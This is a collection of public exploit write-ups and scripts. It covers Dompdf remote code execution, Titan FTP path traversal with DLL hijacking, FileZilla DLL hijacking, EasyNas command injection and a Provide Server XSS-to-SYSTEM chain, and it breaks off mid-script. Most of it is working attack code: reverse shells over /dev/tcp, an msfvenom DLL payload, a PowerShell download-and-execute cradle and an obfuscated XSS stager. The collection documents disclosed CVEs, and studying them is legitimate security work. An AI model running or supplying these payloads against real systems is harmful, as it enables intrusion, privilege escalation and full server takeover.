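#!/usr/bin/python3

# Exploit Title: Dompdf 1.2.1 - Remote Code Execution (RCE)
# Date: 16 February 2023
# Exploit Author: Ravindu Wickramasinghe (@rvizx9)
# Vendor Homepage: https://dompdf.github.io/
# Software Link: https://github.com/dompdf/dompdf
# Version: <1.2.1
# Tested on: Kali linux
# CVE : CVE-2022-28368
# Github Link : https://github.com/rvizx/CVE-2022-28368
#
# Attack chain implemented below:
#   1. A <link rel=stylesheet> pointing at the attacker is injected into the
#      HTML the target converts to PDF (the --inject endpoint).
#   2. That stylesheet declares an @font-face whose src is an attacker-hosted
#      "font": a TrueType blob with a PHP reverse-shell stub appended.
#   3. Vulnerable dompdf fetches the remote font and stores it in its font
#      cache as lib/fonts/<family>_<weight>_<md5(font url)>.php.
#   4. Requesting that cached file through the web server (the --dompdf URL)
#      executes the PHP, which connects back to SHELL_PORT.
#
# Reviewer notes on this revision: the original script SIGKILLed whatever was
# listening on 9001/9002 on the operator's box, only aborted when *both* URLs
# were malformed, shelled out to `echo | md5sum` for a hash, started the HTTP
# server with a bare "python", and served the operator's whole working
# directory.  Those are fixed; the request shapes and the payload itself are
# unchanged.

import argparse
import base64
import curses
import hashlib
import os
import re
import socket
import subprocess
import sys
import urllib.parse
from urllib.parse import urlparse

import requests

HTTP_PORT = 9001            # serves exploit.css / exploit_font.php to the target
SHELL_PORT = 9002           # reverse-shell callback port (nc -lvnp 9002)
PAYLOAD_DIR = "dompdf-rce-payload"   # the only directory exposed over HTTP
REQUEST_TIMEOUT = 30        # seconds; the original requests had no timeout

# Every request to the target is sent with TLS verification disabled: this is
# a PoC aimed at lab instances that commonly run self-signed certificates.
requests.packages.urllib3.disable_warnings(
    requests.packages.urllib3.exceptions.InsecureRequestWarning)


def banner():
    """Print the tool banner (ANSI dim/reset escapes, as in the original)."""
    print('''

 \033[2mCVE-2022-28368\033[0m - Dompdf RCE\033[2m PoC Exploit
 \033[0mRavindu Wickramasinghe\033[2m | rvz - @rvizx9
 https://github.com/rvizx/\033[0mCVE-2022-28368

''')


# Base64 of the TrueType "font" that gets the PHP stub appended.  Kept
# byte-for-byte from the original PoC.  NOTE(review): the many "77+9" groups
# decode to EF BF BD (U+FFFD), which suggests the binary font was at some
# point round-tripped through a lossy text decode; that is probably related
# to the "known issue" the author records in help().  If the target rejects
# the font, regenerate this blob from a clean TTF rather than editing it.
exploit_font = b"AAEAAAAKAO+/vQADACBkdW0xAAAAAAAAAO+/vQAAAAJjbWFwAAwAYAAAAO+/vQAAACxnbHlmNXNj77+9AAAA77+9AAAAFGhlYWQH77+9UTYAAADvv70AAAA2aGhlYQDvv70D77+9AAABKAAAACRobXR4BEQACgAAAUwAAAAIbG9jYQAKAAAAAAFUAAAABm1heHAABAADAAABXAAAACBuYW1lAEQQ77+9AAABfAAAADhkdW0yAAAAAAAAAe+/vQAAAAIAAAAAAAAAAQADAAEAAAAMAAQAIAAAAAQABAABAAAALe+/ve+/vQAAAC3vv73vv73vv73vv70AAQAAAAAAAQAKAAAAOgA4AAIAADMjNTowOAABAAAAAQAAF++/ve+/vRZfDzzvv70ACwBAAAAAAO+/vRU4BgAAAADvv70m270ACgAAADoAOAAAAAYAAQAAAAAAAAABAAAATO+/ve+/vQASBAAACgAKADoAAQAAAAAAAAAAAAAAAAAAAAIEAAAAAEQACgAAAAAACgAAAAEAAAACAAMAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEADYAAwABBAkAAQACAAAAAwABBAkAAgACAAAAAwABBAkAAwACAAAAAwABBAkABAACAAAAcwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="


def get_ip_addresses():
    """Return candidate attacker-side IPv4 addresses for the target to call back to.

    Tries ``ip -4 -o addr`` first and falls back to ``ifconfig`` (the tool the
    original used; it is not installed by default on newer distributions).
    Values starting with 255 (netmasks) are dropped, duplicates removed and
    'localhost' is put first as in the original -- note that 'localhost' only
    makes sense when the target runs on this same machine.
    """
    output = ""
    for cmd in (["ip", "-4", "-o", "addr"], ["ifconfig"]):
        try:
            output = subprocess.check_output(cmd, stderr=subprocess.DEVNULL).decode(errors="replace")
            break
        except (OSError, subprocess.CalledProcessError):
            continue
    ip_pattern = r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}'
    found = [ip for ip in re.findall(ip_pattern, output) if not ip.startswith('255')]
    ip_addresses = sorted(set(found))
    ip_addresses.insert(0, 'localhost')
    return ip_addresses


def choose_ip_address(stdscr, ip_addresses):
    """Curses menu: arrow keys move the highlight, Enter returns the chosen address.

    Run it through ``curses.wrapper`` so the terminal is restored even if an
    exception escapes.
    """
    curses.curs_set(0)
    curses.noecho()
    stdscr.keypad(True)
    current_row = 0
    last_row = len(ip_addresses) - 1
    prompt = "[ins]: please select an ip address, use up and down arrow keys, press enter to select.\n\n"
    while True:
        stdscr.clear()
        stdscr.addstr(prompt)
        for i, ip_address in enumerate(ip_addresses):
            stdscr.addstr(ip_address, curses.A_REVERSE if i == current_row else curses.A_NORMAL)
            stdscr.addstr("\n")
        key = stdscr.getch()
        if key == curses.KEY_UP and current_row > 0:
            current_row -= 1
        elif key == curses.KEY_DOWN and current_row < last_row:
            current_row += 1
        elif key == curses.KEY_ENTER or key in (10, 13):
            return ip_addresses[current_row]


def help():
    """Print usage plus the original author's known-issue note, then exit."""
    print('''
usage: 
 ./dompdf-rce --inject <css-inject-endpoint> --dompdf <dompdf-instance> 

example:
 ./dompdf-rce --inject https://vuln.rvz/dev/convert-html-to-pdf?html= --dompdf https://vuln.rvz/dompdf/

notes: 
 - Provide the parameters in the URL (regardless the request method)
 - Known Issues! - Testing with https://github.com/positive-security/dompdf-rce 
 The program has been successfully tested for RCE on some systems where dompdf was implemented,
 But there may be some issues when testing with the dompdf-rce PoC at https://github.com/positive-security/dompdf-rce
 due to a known issue described at https://github.com/positive-security/dompdf-rce/issues/2. 
 In this application, the same implementation was added for now. 
 Although it may be pointless at the moment, you can still manually add the payload 
 by copying the exploit_font.php file to ../path-to-dompdf-rce/dompdf/applicaiton/lib/fonts/exploitfont_normal_3f83639933428d70e74a061f39009622.php 
 
 - more : https://www.cve.org/CVERecord?id=CVE-2022-28368
''')
    sys.exit(0)


def check_url(url):
    """Return True if *url* looks like an http(s)/ftp(s) URL, else print an error and return False.

    The regex accepts a registered hostname, 'localhost' or a dotted IPv4,
    an optional port, and an optional path/query.
    """
    regex = re.compile(
        r'^(?:http|ftp)s?://'
        r'(?:(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\.)+(?:[A-Z]{2,6}\.?|[A-Z0-9-]{2,}\.?)|'
        r'localhost|'
        r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})'
        r'(?::\d+)?'
        r'(?:/?|[/?]\S+)$', re.IGNORECASE)
    if not re.match(regex, url):
        print(f"\033[91m[err]:\033[0m {url} is not a valid url")
        return False
    return True


def final_param(url):
    """Return the name of the last query parameter in *url*, or None if there is none.

    The inject URL is expected to end in "?param=" (or "&param="); the name
    is reused as the key of the POST body.  A parameter without "=" is
    ignored, as in the original.
    """
    query_start = url.rfind('?')
    if query_start == -1:
        query_start = url.rfind('&')
    if query_start == -1:
        return None
    query_string = url[query_start + 1:]
    for param in reversed(query_string.split('&')):
        if '=' in param:
            name = param.split('=')[0]
            if name:
                return name
    return None


def font_cache_name(font_url):
    """Return (md5 hex digest, cached filename) dompdf uses for a remote font at *font_url*.

    dompdf caches fetched fonts as <family>_<weight>_<md5 of the src url>;
    exploit.css uses family 'exploitfont' and weight 'normal', and the cache
    file keeps the remote ".php" extension -- that is what makes the
    appended stub executable when it is requested later.
    """
    digest = hashlib.md5(font_url.encode()).hexdigest()
    return digest, f"exploitfont_normal_{digest}.php"


def ensure_port_free(port):
    """Abort with a message if *port* is already bound on any local interface.

    The original PoC sent SIGKILL to whatever was listening on 9001/9002 --
    on a shared pentest box that may be someone else's listener.  Refusing
    to start is the safe default; free the port yourself and re-run.
    """
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as probe:
        probe.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        try:
            probe.bind(("0.0.0.0", port))
        except OSError as exc:
            print(f"\033[91m[err]:\033[0m port {port} is already in use ({exc}); free it and re-run")
            sys.exit(1)


def write_payload_files(sip, shell):
    """Write exploit.css and exploit_font.php into PAYLOAD_DIR and return its absolute path.

    exploit_font.php is the font blob followed by the PHP stub; exploit.css
    points the target at it.  The font is written as bytes so the locale's
    default text encoding cannot alter it (the original decoded it as UTF-8
    and wrote text).  Only this directory is served over HTTP.
    """
    payload_dir = os.path.abspath(PAYLOAD_DIR)
    os.makedirs(payload_dir, exist_ok=True)
    css = f'''
@font-face {{
    font-family:'exploitfont';
    src:url('http://{sip}:{HTTP_PORT}/exploit_font.php');
    font-weight:'normal';
    font-style:'normal';
}}
'''
    with open(os.path.join(payload_dir, "exploit.css"), "w") as f:
        f.write(css)
    with open(os.path.join(payload_dir, "exploit_font.php"), "wb") as f:
        f.write(base64.b64decode(exploit_font) + b"\n" + shell.encode())
    return payload_dir


def browser_headers(host):
    """Return the browser-like request headers used for every request to the target."""
    return {
        'Host': host,
        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
        'Accept-Language': 'en-US,en;q=0.5',
        'Connection': 'close',
        'Upgrade-Insecure-Requests': '1',
    }


def inject_stylesheet(injectpoint, param, sip):
    """Deliver the <link> to exploit.css to the inject endpoint via GET and POST.

    Both request shapes are kept from the original PoC: the GET appends the
    url-encoded payload to the inject URL (which must end in "?param="), and
    the POST sends a JSON-looking body under a form content-type.  Which one
    the target honours depends on the application.  A 200 from either is
    reported, but the only reliable confirmation that dompdf fetched the font
    is a GET for /exploit_font.php showing up in the local http.server log.
    """
    url = injectpoint[:-1] if injectpoint.endswith("/") else injectpoint
    # netloc keeps a non-default port in the Host header; hostname dropped it.
    headers = browser_headers(urlparse(injectpoint).netloc)
    headers['Content-Type'] = 'application/x-www-form-urlencoded'

    payload = f"<link rel=stylesheet href='http://{sip}:{HTTP_PORT}/exploit.css'>"
    data = '{\r\n"' + param + '": "' + payload + '"\r\n}'
    try:
        response1 = requests.get(url + urllib.parse.quote(payload), headers=headers,
                                 verify=False, timeout=REQUEST_TIMEOUT)
        response2 = requests.post(url, headers=headers, data=data,
                                  verify=False, timeout=REQUEST_TIMEOUT)
    except requests.RequestException as exc:
        print(f"\033[91m[err]:\033[0m failed to send the requests! check connection to the host ({exc})")
        sys.exit(1)

    if 200 in (response1.status_code, response2.status_code):
        print("\n\033[92m[inf]: success!\033[0m \n\033[94m[inf]:\033[0m url: " + url + " - status_code: 200")
        print("\033[94m[inf]:\033[0m confirm the font was fetched: look for GET /exploit_font.php in the http server output above")
    else:
        print("\n\033[91m[err]: failed to send the exploit.css!\033[0m \n\033[94m[inf]:\033[0m url: " + url
              + " - status_code: " + str(response1.status_code) + "," + str(response2.status_code))


def trigger_payload(dompdf_url, cache_name):
    """Request the cached font file under lib/fonts so the appended PHP executes.

    PHP's exec() waits for the command, and the reverse shell keeps running,
    so this request normally does NOT complete while the shell is alive -- a
    read timeout here is the expected outcome, not a failure.
    """
    url = dompdf_url[:-1] if dompdf_url.endswith("/") else dompdf_url
    url += "/lib/fonts/" + cache_name
    headers = browser_headers(urlparse(dompdf_url).netloc)  # original reused the inject host
    try:
        response = requests.get(url, headers=headers, verify=False, timeout=REQUEST_TIMEOUT)
    except requests.exceptions.ReadTimeout:
        print("\n\033[92m[inf]: request is still open after %ss -- the shell is probably connected, check your listener.\033[0m" % REQUEST_TIMEOUT)
        print("\033[94m[inf]:\033[0m url: " + url)
        return
    except requests.RequestException as exc:
        print(f"\n\033[91m[err]: failed to trigger the payload! \033[0m ({exc})\n\033[94m[inf]:\033[0m url: " + url)
        return

    if response.status_code == 200:
        print("\n\033[92m[inf]: success!\033[0m \n\033[94m[inf]:\033[0m url: " + url + " - status_code: " + str(response.status_code))
    else:
        # 404 here usually means the font was never fetched/cached (wrong
        # callback IP, firewall, or the target never rendered the injected HTML).
        print("\n\033[91m[err]: failed to trigger the payload! \033[0m \n\033[94m[inf]:\033[0m url: " + url + " - status_code: " + str(response.status_code))


def main():
    """Parse arguments, stage the payload, inject the stylesheet, then trigger the cached PHP."""
    banner()

    if len(sys.argv) == 1:
        print("\033[91m[err]:\033[0m no endpoints were provided. try --help")
        sys.exit(1)
    if sys.argv[1] in ("--help", "-h"):
        help()

    parser = argparse.ArgumentParser(
        description='', add_help=False,
        usage="./dompdf-rce --inject <css-inject-endpoint/file-with-multiple-endpoints> --dompdf <dompdf-instance-endpoint>")
    parser.add_argument('--inject', type=str, required=True,
                        help='[info] provide the url of the css inject endpoint')
    parser.add_argument('--dompdf', type=str, required=True,
                        help='[info] provide the url of the dompdf instance')
    args = parser.parse_args()
    injectpoint = args.inject
    dompdf_url = args.dompdf

    # Bug fix: the original used `not a and not b`, so it only aborted when
    # BOTH urls were malformed and happily continued with one bad url.
    if not check_url(injectpoint) or not check_url(dompdf_url):
        sys.exit(1)

    param = final_param(injectpoint)
    if param is None:
        print("\n\033[91m[err]: no parameters were provided! \033[0mnote: provide the parameters in the url (--inject-css-endpoint url?param=) ")
        sys.exit(1)

    # Check our own ports before touching the target.
    ensure_port_free(HTTP_PORT)
    ensure_port_free(SHELL_PORT)

    sip = curses.wrapper(choose_ip_address, get_ip_addresses())
    print(f'\033[94m[inf]:\033[0m selected ip address: {sip}')

    shell = f"<?php exec(\"/bin/bash -c 'bash -i >& /dev/tcp/{sip}/{SHELL_PORT} 0>&1'\");?>"
    print("\033[94m[inf]:\033[0m using payload: " + shell)

    print("\033[94m[inf]:\033[0m generating exploit.css and exploit_font.php files...")
    payload_dir = write_payload_files(sip, shell)
    print(f"\033[94m[inf]:\033[0m payload files written to {payload_dir}")

    font_url = f"http://{sip}:{HTTP_PORT}/exploit_font.php"
    md5_hash, cache_name = font_cache_name(font_url)
    print("\033[94m[inf]:\033[0m url hash: " + md5_hash)
    print("\033[94m[inf]:\033[0m filename: " + cache_name)

    print(f"\033[94m[inf]:\033[0m starting http server on port {HTTP_PORT}..")
    # sys.executable rather than a bare "python": on many systems "python" is
    # missing or is Python 2, which has no `-m http.server`.  cwd limits what
    # the server exposes to the two payload files.
    http_server = subprocess.Popen([sys.executable, '-m', 'http.server', str(HTTP_PORT)],
                                   cwd=payload_dir)
    try:
        print("\033[94m[inf]:\033[0m sending the payloads..\n")
        inject_stylesheet(injectpoint, param, sip)
    finally:
        # The font is cached on the target by now (if it ever will be), so the
        # server is no longer needed; always stop it, even on a hard failure.
        print("\033[94m[inf]:\033[0m terminating the http server..")
        http_server.terminate()
        http_server.wait()

    print(f"\033[93m[ins]:\033[0m start a listener on port {SHELL_PORT} (execute the command on another terminal and press enter)")
    print(f"\nnc -lvnp {SHELL_PORT}")
    input("\n\033[93m[ins]:\033[0m press enter to continue!")
    print("\033[93m[ins]:\033[0m check for connections!")

    trigger_payload(dompdf_url, cache_name)
    print("\033[94m[inf]:\033[0m process complete!")


if __name__ == '__main__':
    main()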
<pre><code>Titan FTP Server Path Traversal Vulnerability in move-file Function<br />Version: < 2.0.1.2102<br />CVE-2023-22629<br />CWE-24: Path Traversal: '../filedir'<br /><br />Titan FTP Server is vulnerable to a path traversal attack in the move-file function of its web API (the "mv" action of MxUtilFileAction, used in the script below). An attacker exploits it by supplying a crafted newPath parameter containing directory traversal sequences (e.g. '../') to move a file they have uploaded into a directory outside their own folder. The server does not validate the user-supplied newPath parameter, so a single request is enough to place an attacker-controlled file anywhere the service account can write -- including the server's own installation directory -- which allows reading or overwriting files outside the intended directory and, as shown below, executing arbitrary code.<br /><br />This is an authenticated exploit: the attacker needs a user account on the Titan FTP server in order to upload the files.<br /><br />CWE-427: Uncontrolled Search Path Element<br /><br />The service application is vulnerable to a DLL search-order hijack. It imports several Windows DLLs, such as version.dll, and because the application directory comes first in the default Windows DLL search order, a DLL dropped there is loaded in preference to the system copy. Using the path traversal, the attacker places a proxy DLL named version.dll in the application directory; the proxy forwards its exports to the original version.dll, which is uploaded alongside it under the name version32.dll so the service keeps working. When the service loads version.dll, the attacker's code runs as NT AUTHORITY\SYSTEM. Note that the hijack only fires when the process loads the library, so a restart of the service (or of the host) may be needed before the payload executes.<br /><br /><br />Exploit code<br /><br />Using the bash script below, an authenticated attacker uploads two DLL files and performs the DLL hijack by proxying. 
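In this poc, I am uploading a reverse-shell DLL file named version.dll, which proxies its exports to the original version.dll, here uploaded under the name version32.dll.




#!/bin/bash
# CVE-2023-22629 - Titan FTP Server < 2.0.1.2102: authenticated path traversal
# in the "mv" file action, used to drop a proxy version.dll (plus the real
# DLL renamed version32.dll) into the srxserver install directory for a DLL
# search-order hijack (CWE-427).
#
# Usage: ./titan-mv-traversal.sh [base-url] [user] [pass] [proxy-dll] [original-dll]
# Requires curl and jq; both DLLs must be in the current directory.
set -euo pipefail

url="${1:-http://192.168.16.226}"
user="${2:-me}"
pass="${3:-me}"
proxydll="${4:-version.dll}"
orig_dll="${5:-version32.dll}"

# -k: the PoC was written against a lab instance; TLS verification is
# disabled on purpose.  Remove it when the target has a valid certificate.
CURL="curl -s -k"

# host[:port] without scheme or path (the original used `cut -d/ -f3`).
host="${url#*://}"; host="${host%%/*}"

# --- login: obtain SessionId and ServerGUID --------------------------------
auth=$($CURL -X POST -H "Host: $host" -H "No-Auth-Challenge: true" -H "User-Agent: Nah" \
    -H "content-type: application/json" -H "Accept: */*" -H "Origin: $url" -H "Referer: $url" \
    -H "Accept-Encoding: gzip, deflate" -H "Accept-Language: en-US,en;q=0.9,nb;q=0.8,no;q=0.7,en-GB;q=0.6" \
    -H "Connection: close" \
    -d "{\"user\":\"$user\",\"pass\":\"$pass\",\"ticket\":null,\"showEULA\":false}" "$url/WebApi/Login")
# jq -r yields the raw value, so no manual quote stripping is needed.
SessionId=$(printf '%s' "$auth" | jq -r '.auth.SessionId')
ServerGUID=$(printf '%s' "$auth" | jq -r '.auth.ServerGUID')
if [ -z "$SessionId" ] || [ "$SessionId" = "null" ]; then
    echo "[-] login failed: $auth" >&2
    exit 1
fi

# --- upload a file into the user's folder (single chunk) --------------------
upload() {
    local file="$1"
    # The original hard-coded TotalFileSize=19456 for both DLLs; the real size
    # is sent instead so a differently sized DLL is not truncated if the
    # server honours the field.  ChunkSize/TotalChunks are kept as in the PoC.
    local size=$(( $(wc -c < "$file") ))
    $CURL -i -v -X POST -H "User-Agent: Nah" -H 'No-Auth-Challenge: true' -H 'enctype: multipart/form-data' \
        -H "SRTSessionId: $SessionId" \
        -F "request={\"Model\":\"MxUtilFileAction\",\"ServerGUID\":\"$ServerGUID\",\"Action\":\"l\",\"SRTSessionId\":\"$SessionId\",\"Ticket\":null,\"Data\":{\"action\":\"uc\",\"chunkData\":{\"UploadUid\":\"935ee903-2f65-442a-8a0b-1b23d12537c5\",\"FileName\":\"$file\",\"RelativeFullPath\":\"/$file\",\"ContentType\":\"contenttype\",\"ChunkIndex\":0,\"ChunkSize\":2,\"TotalChunks\":1,\"TotalFileSize\":$size,\"Overwrite\":true},\"domainData\":false,\"domainLogs\":false,\"SRTSessionId\":\"$SessionId\"}}" \
        -F "chunk=@$file;filename=blob;type=application/octet-stream" "$url/WebApi/ProcessWithChunk"
}

# --- move the uploaded file out of the user folder via a traversal newPath --
# Target: C:\Program Files\South River Technologies\srxserver\
move_into_install_dir() {
    local file="$1"
    $CURL -i -X POST -H "No-Auth-Challenge: true" -H "SRTSessionId: $SessionId" -H "User-Agent: Nah" \
        -H "content-type: application/json" -H "Accept: */*" -H "Origin: $url" -H "Referer: $url/" \
        -H "Accept-Encoding: gzip, deflate" -H "Accept-Language: en-US,en;q=0.9,nb;q=0.8,no;q=0.7,en-GB;q=0.6" \
        -H "Connection: close" \
        -d "[{\"Model\":\"MxUtilFileAction\",\"ServerGUID\":\"$ServerGUID\",\"Action\":\"l\",\"disableErrorSnackBar\":true,\"Data\":{\"action\":\"mv\",\"path\":\"/$file\",\"newPath\":\"/../../../../../../../Program Files/South River Technologies/srxserver/$file\",\"domainData\":false,\"domainLogs\":false,\"SRTSessionId\":\"$SessionId\"},\"SRTSessionId\":\"$SessionId\"}]" \
        "$url/WebApi/Process"
}

upload "$proxydll"
upload "$orig_dll"
move_into_install_dir "$proxydll"
move_into_install_dir "$orig_dll"
# The proxy DLL runs when the service next loads version.dll (a service or
# host restart may be required).

</code></pre>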
<pre><code>#---------------------------------------------------------<br /># Title: FileZilla Client 3.63.1 - 'TextShaping.dll' DLL Hijacking<br /># Date: 2023-02-14<br /># Author: Bilal Qureshi<br /># Vendor: https://filezilla-project.org/<br /># Version: 3.63.1<br /># Tested on: Windows 10 Pro 64-bit (10.0, Build 19044)<br />#---------------------------------------------------------<br /><br /><br />Description:<br />FileZilla is a free and open-source, cross-platform FTP application, consisting of FileZilla Client and FileZilla Server. Clients are available for Windows, Linux, and macOS. Both server and client support FTP and FTPS, while the client can in addition connect to SFTP servers.<br /><br /><br />The library TextShaping.dll is not present in the FileZilla installation folder, yet the client attempts to load it from there, so a DLL placed under that name in the folder is loaded by the application.<br /><br />Build the malicious DLL with msfvenom. The output file must be named exactly TextShaping.dll (the original advisory wrote "TextShaping.sll", a typo):<br /><br />msfvenom -p windows/x64/shell_reverse_tcp LHOST=&lt;IP&gt; LPORT=7777 -f dll -o TextShaping.dll<br /><br />Place it in the FileZilla installation folder. Note that writing to this folder normally requires administrative rights (or a weakened ACL), so this is a local persistence / code-execution-on-launch scenario rather than a remote entry point.<br /><br />Start a listener with nc, then launch FileZilla:<br /><br />nc -lvp 7777<br /><br />C:\Program Files\FileZilla FTP Client&gt;<br />C:\Program Files\FileZilla FTP Client&gt;<br /><br /></code></pre>
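#!/usr/bin/python3
# Exploit Title: EasyNas 1.1.0 - OS Command Injection
# Date: 2023-02-9
# Exploit Author: Ivan Spiridonov (ivanspiridonov@gmail.com)
# Author Blog: https://xbz0n.medium.com
# Version: 1.0.0
# Vendor home page : https://www.easynas.org
# Authentication Required: Yes
# CVE : CVE-2023-0830
#
# backup.pl passes the ``name`` query parameter to a shell unsanitised, so a
# "|" lets an authenticated user run arbitrary commands.  The PoC pipes a
# base64-encoded reverse shell into ``sudo sh``; the resulting shell is root
# only if the web user has that sudo right (which the original PoC relies on).
#
# Reviewer note: the original usage string asked for "http(s)://url" but the
# code always prepended "https://", so a full URL became "https://https://..".
# Both forms are accepted now; everything else is unchanged.

import base64
import sys
import time
import urllib.parse

import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning

# The appliance normally runs with a self-signed certificate, so every request
# below uses verify=False; silence the warning that would otherwise spam stderr.
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

USAGE = "Usage: ./exploit.py http(s)://url username password listenerIP listenerPort"

# Injected tail of the ``name`` parameter, already url-encoded.  Decoded:
#     | echo <b64> | base64 -d | sudo sh || a #
# Base64 keeps the one-liner free of characters needing escaping; "|| a #"
# swallows whatever the script appends after the injection point.
INJECT_SUFFIX = "%7cecho+{b64}+%7c+base64+-d+%7c+sudo+sh+%7c%7ca+%23"


def base_url(target):
    """Return ``scheme://host[:port]`` for *target* with no trailing slash.

    A bare host (the form the original code actually expected) defaults to
    https; an explicit http:// or https:// prefix is kept as given.
    """
    if not target.startswith(("http://", "https://")):
        target = "https://" + target
    return target.rstrip("/")


def build_payload(listener_ip, listener_port):
    """Return the url-encoded base64 of the reverse-shell command for ``name``.

    ``>&`` and ``/dev/tcp`` are bash features while the command runs under
    ``sudo sh``; this presumably works because /bin/sh is bash on the tested
    appliance.  If the callback never arrives, that is the first thing to check.
    """
    command = "/bin/sh -i >& /dev/tcp/{}/{} 0>&1".format(listener_ip, listener_port)
    return urllib.parse.quote(base64.b64encode(command.encode()).decode())


def login(session, base, user, password):
    """Authenticate *session* against login.pl; exit if the login page is served again."""
    print("Sending login request...")
    response = session.post(f"{base}/easynas/login.pl",
                            data={'usr': user, 'pwd': password, 'action': 'login'},
                            verify=False)
    if 'Login to EasyNAS' in response.text:
        print("Unsuccessful login")
        sys.exit()
    print("Login successful")


def main():
    if len(sys.argv) < 6:
        print(USAGE)
        sys.exit()

    base = base_url(sys.argv[1])
    session = requests.Session()
    try:
        login(session, base, sys.argv[2], sys.argv[3])
    except requests.RequestException as err:
        print(f"[-] Could not reach {base}: {err}")
        sys.exit(1)

    payload = build_payload(sys.argv[4], sys.argv[5])
    exploit_url = (f"{base}/easynas/backup.pl?action=backup&menu=none&.submit=Backup&name="
                   + INJECT_SUFFIX.format(b64=payload))

    # The reverse shell keeps the CGI process busy, so the request normally
    # never completes: a ReadTimeout is the expected "it worked" signal.
    timeout = 3
    try:
        exploit_response = session.get(exploit_url,
                                       headers={'User-Agent': 'Mozilla/5.0 Gecko/20100101 Firefox/72.0'},
                                       timeout=timeout, verify=False)
    except requests.exceptions.ReadTimeout:
        print("[+] Everything seems ok, check your listener.")
        sys.exit()
    except requests.RequestException as err:
        print(f"[-] Request failed: {err}")
        sys.exit(1)

    # A reply within the timeout means the injected command returned at once.
    # Kept from the original: a non-200 is still reported as a probable success.
    if exploit_response.status_code != 200:
        print("[+] Everything seems ok, check your listener.")
    else:
        print("[-] Exploit failed, system is patched or credentials are wrong.")


if __name__ == "__main__":
    main()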
<pre><code>Provide Server v. 14.4<br />CVE-2023-23286<br />Vulnerabilities:<br />CWE-79: Improper Neutralization of Input During Web Page Generation<br /><br />Unauthenticated stored XSS in the server log, delivered through the username field of the login form.<br /><br />CWE-352: Cross-Site Request Forgery<br /><br />The CSRF token is embedded in the page (a meta tag named csrf-token) where same-origin script can read it, so the XSS payload can obtain a valid token and attach it to its own XMLHttpRequest/fetch calls. Combined, the two issues let an attacker reconfigure the server from an administrator's browser so that it runs commands as "NT AUTHORITY\SYSTEM".<br /><br />Impact:<br /><br /> An attacker can exploit the unauthenticated stored XSS by injecting code into the login form's username field. When an administrator views the server log, the code executes in the administrator's browser, allowing the attacker to steal data or carry out further actions with the administrator's session.<br /> Through the CSRF weakness, the injected script can add a "task" -- concretely, it sets the server's on-connect message to an %EXECUTE(...)% directive -- that runs commands with SYSTEM privileges. This can give the attacker complete control of the server, access to sensitive data, or the ability to disrupt the service.<br /><br />Proof of Concept<br />RCE via XSS and CSRF<br /><br /> The attacker places the staged XSS into the username field and sends the login request. The stager lands in the server log and fires when an administrator opens the log.<br /> The XSS stager loads and runs the XSS payload. The payload sets the on-connect message (MsgOnConnect) to a PowerShell download cradle wrapped in %EXECUTE(...)%, which then runs every time a client connects to the server -- including unauthenticated connections.<br /> The PowerShell script downloaded in this example is a reverse shell that connects back to the attacker. 
As the task runs as NT System on the server, the attacker will have full controll on the server.<br /><br />Powershell Downloadcradle<br /><br />PowerShell -noprofile -executionpolicy bypass "Start-process powershell.exe -argumentlist '-window hidden -noexit Start-Job { IEX(IWR https://example.com/rev.ps1 -UseBasicParsing) }'";exit<br />Staged XSS<br /><br /><img id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vZXhhbXBsZS5jb20veHNzLmpzIjtkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKGEpOw src=https://example.com/1 onload=eval(atob(this.id))><br />XSS payload<br /><br /><br /><br />var vhost = window.location.protocol+'\/\/'+window.location.host<br />var csrf_token = document.querySelector("meta[name='csrf-token']").getAttribute("content")<br /> , o = XMLHttpRequest.prototype.open;<br />XMLHttpRequest.prototype.open = function(a, b) {<br /> var c = o.apply(this, arguments);<br /> return (b.startsWith("/") || b.startsWith(window.location.origin)) && this.setRequestHeader("X-CSRF-Token", csrf_token),<br /> c<br />}<br /><br /> <br /><br />fetch(vhost+'/ajax/SetEventsAndMessages',{<br /> method: 'POST',<br /> headers: {<br /> 'Content-Length': '3845', <br /> 'Sec-Ch-Ua': '"Not?A_Brand";v="8", "Chromium";v="108", "Microsoft Edge";v="108"', <br /> 'X-Csrf-Token': csrf_token, <br /> 'Sec-Ch-Ua-Mobile': '?0', <br /> 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Edg/108.0.1462.54', <br /> 'Content-Type': 'application/x-www-form-urlencoded;charset=UTF-8', <br /> 'Accept': 'application/json, text/javascript, */*; q=0.01', <br /> 'X-Requested-With': 'XMLHttpRequest', <br /> 'Sec-Ch-Ua-Platform': '"macOS"', <br /> 'Origin': vhost, <br /> 'Sec-Fetch-Site': 'same-origin', <br /> 'Sec-Fetch-Mode': 'cors', <br /> 'Sec-Fetch-Dest': 'empty', <br /> 'Accept-Encoding': 'gzip, deflate', <br /> 'Accept-Language': 'en-US,en;q=0.9,nb;q=0.8,no;q=0.7,en-GB;q=0.6', <br /> 'Connection': 
